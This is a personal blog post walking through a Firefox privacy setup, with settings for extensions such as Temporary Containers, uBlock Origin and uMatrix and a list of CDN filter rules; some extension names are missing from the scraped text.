I've tried plenty of things to help improve privacy on the internet. I've done
the whole spectrum from minimum-effort and no privacy to privacy-nut lock down
mode. In this post I'm going to go over various things I've used and different
setups I've had, then walk through explaining what I have now and how to
recreate the setup.
### SETUP 3 ###
This is what I'd probably call a "realist" setup. You get a reasonable level of
privacy and it's not terrifying to work with. Sites for the most part work fine
after a little tweaking. This is the setup I use at the moment, so I'll walk
through what I've done and explain how to recreate it.
First place to start is with extensions. I have 12 installed and I'll walk
through each including all the settings I have for them:
is designed to remove nonsense from URLs that can be used for
tracking. It's very simple and I've done no config with it. Just install it and
maybe hide the button for it as you'll probably never need to click it. It's
nice to keep the UI tidy so there's more space for the stuff that actually
CSS Exfil Protection
protects you against "CSS data exfiltration attacks". Very
simple little extension with no options to configure. As before, add, hide
button, move on.
that you get them locally and use them locally and so avoid making needless
Decentraleyes hos 4 options, and we want all enabled except the second one
labelled "Block requests for missing resources" as that will break a tremendous
amount of things.
Firefox Multi-Account Containers
is one of Mozilla's own extensions and it adds
the ability to create special containers for tabs to sit in. The idea is that
each container is completely separated from the next, so some sketchy website in
one container can't see any cookies from or exploit the state of any other tab
in a different container. You might have heard of the very simple tracking
attack in which a site can make requests to specific image URLs and use the
response code to determine whether you're logged into Facebook or Twitter or
whatnot. Having a malicious site in a container and social media in a different
one makes you safe from this kind of attack as the request for the image in the
isolated container can't reach it even if you're logged in in another container.
This extension doesn't have any options, but what you want to do is clear the
stock containers it makes and create an individual container for each website
you log into that you want to stay logged into. For instance, I have one for
Riot, one for Mastodon, one for Protonmail (though it's not entirely necessary),
and one for DuckDuckGo (to keep the theme the same).
is much the same as Smart HTTPS and other similar HTTPS-enforcing
extensions, but it's very lightweight and unobtrusive and also claims to get
along well with Temporary Containers which is a good thing. In the options for
it, we want Automatic mode on, "Remember secure sites" on, and to check again if
a site supports HTTPS after Firefox is restarted to make sure when a site fixes
itself and uses HTTPS that we get on it as soon as possible.
is less a privacy boost and more a convenience boost. If - like me -
you use Invidious, then this extension will intercept any requests to YouTube
before they're even sent and redirect them to Invidious. This means you can very
safely click on a YouTube link without worrying about Google because you'll get
sent straight to Invidious. I didn't change any options for this extension.
Privacy-Oriented Origin Policy
removes origin headers from requests when
they're unlikely to be necessary. This dramatically aids in protecting your
privacy - especially when using a VPN as you absolutely should be
later too). We want "Global mode" on "aggressive", nothing in "Overrides", "Type
filters" won't have any effect in aggressive mode, and under "Exclusions" we
want "Exclude root domain matches" to be enabled.
does what it says on the tin and will attempt to find the source
URL from redirects and go there directly rather than stopping at however many
intermediate pages. Most intermediate pages are used for tracking, so avoiding
them here helps plenty. Under "Mode", we want it set to "Skip all redirects
except for URLs matching any of the lines on the blacklist" but have "Skip
redirects for URLs with the same public domain" disabled. The blacklist should
have a number of things there by default such as "/account", "/auth", and such.
Leave these as they are. I'd also optionally disable the notification pop-up as
it can get a little annoying at times - especially if you have your
notifications make noise.
is a wonderful extension. It won't improve your privacy, but it's
absolutely wonderful for making the websites you use a lot look nicer. This
extension is completely optional, but I like using it, especially for little
fixes. For instance, I have a style on Mastodon for making the columns in the UI
expand so they evenly fill the width of the screen so they're a little wider. I
also have a number of fixes for Riot such as removing a few buttons, changing
the mention colour to the green so they don't look like horrible errors,
swapping around a few username colours so I'm the nice blue rather than green,
and reducing the size of images as they are unusably huge.
is arguably the most powerful privacy-boosting extension
you'll get here. It uses exactly the same system as the Multi-account
containers, but automatically spawns new containers for each website you visit
so they're all completely isolated. There are quite a few options though - we'll
start in the "General" tab. Enable automatic mode - this is what makes everting
work nice and smoothly. Don't have notifications when containers are deleted or
that's all you'll see in you notifications. Leave the container name prefix as
"tmp", or you can change it if you want, but eh. Random colours are nice to help
see them working, but leave the icon on the circle so it stays tidy as these
containers are going to be showing up in the list under Multi-account
containers. Everything else on this tab stays default - onto the "Isolation"
tab. Ignore the "Per Domain" settings and go straight to "Global". There are 4
options with drop downs. We want all of them to be set to the option that has
get isolated" in parentheses at the end. Next, under "Multi-
Account Containers" we want that option disabled otherwise everything we do with
permanent containers gets broken. On the "Advanced" tab, disable ignoring
requests for "getpocket.com" as Pocket is stupid anyway - let it break.
is an ad-blocker, but comes with a few extra powers. We'll be
using it mainly just as a static content blocker, where uMatrix will be more
dynamic and interactive. Under the "Settings" tab, we want to enable "Hide
placeholders of blocked elements" to keep our pages tidy, enable "Show the
number of blocked requests on the icon", enable "Make use of context menu where
appropriate", disable "Disable tooltips", disable "Color-blind friendly" (unless
you're colour-blind obviously), disable "Enable cloud storage support", and
enable "I am an advanced user" briefly. Click the little gears icon next to that
last option and look for the option named "suspendTabsUntilReady". Make that say
"true". This completely blocks anything from loading at all until uBlock is
ready to filter things. This prevents unwanted trackers and content being loaded
before uBlock is ready to filter it out. Continuing now, enable all options
under "Privacy" and under default behaviour we want to enable "Disable cosmetic
filtering". Next we want to go to the "Filter lists" tab. Enable "Auto-update
filter lists", disable "Parse and enforce cosmetic filters", and enable "Ignore
generic cosmetic filters". For the filters themselves we want the following: "My
filters", all "Built-in" lists excluding the experimental one, "Adblock Warning
Removal List", "EasyList", all "Privacy" lists, all "Malware domains" lists,
"AdGuard Annoyances", "Fanboy's Annoyance List", "Dan Pollock's hosts file",
"Pete Lowe's Ad and tracking server list", and finally we want to import a
custom list, using the URL 'https://raw.githubusercontent.com/hostsadiq/adblock-
↳nocoin-list/master/nocoin.txt'. Remember to apply changes. We're using
Decentraleyes, so under the "My Rules" tab, we want to add the following:
* ajax.googleapis.com * noop
* ajax.aspnetcdn.com * noop
* ajax.microsoft.com * noop
* cdnjs.cloudflare.com * noop
* code.jquery.com * noop
* cdn.jsdelivr.net * noop
* yastatic.net * noop
* yandex.st * noop
* apps.bdimg.com * noop
* libs.baidu.com * noop
* lib.sinaapp.com * noop
* upcdn.b0.upaiyun.com * noop
* cdn.bootcss.com * noop
* sdn.geekzu.org * noop
* ajax.proxy.ustclug.org * noop
is a dynamic filtering extension that allows you to see what's being
requested from where and selectively block and allow only what you're ok with.
Starting simple, open the extension and switch to global mode (asterisk). We
want to block "all" so everything is denied by default, but we want to enable
all CSS and images. Next, we want to allow cookies and frames for 1st party
. Lastly, open the 3 dots menu and enable "Forbid web workers", "Spoof
Referer header", and "Spoof <noscript> tags". Next, we can go into preferences.
Under the "Settings" tab under "Convenience", we want to enable "Show the number
of blocked resources on the icon", disable "Hide placeholder of blocked
elements" but enable "Hide placeholder of blacklisted elements", enable "Spoof
<noscript> tags when 1st party scripts are blocked", and disable the last 2
options. Ignore the "Matrix" options, then enable everything under "Privacy"
except "Strict HTTPS: forbid mixed content" as it'll otherwise break a lot of
things. Under the "My rules" tab, make sure there's the option "no-workers: *
true" added and committed. Lastly we want to go to the "Assets" tab. Enable
"Auto-update assets", but we want to disable all the hosts files as uBlock
Origin is handling this all for us already. Under "Ruleset recipes", enable
"Ruleset recipes for English websites". If you're using Invidition, then import
a rule set recipe by putting in this URL: 'https://gitlab.com/Booteille/inviditi
↳on/raw/master/umatrix/recipe.txt'. Next, add the same rules from above to the
"My Rules" tab in uMatrix as we did before in uBlock Origin.
Copyright Oliver Ayre 2019. Site licensed under the GNU Affero General Public
Licence version 3 (AGPLv3).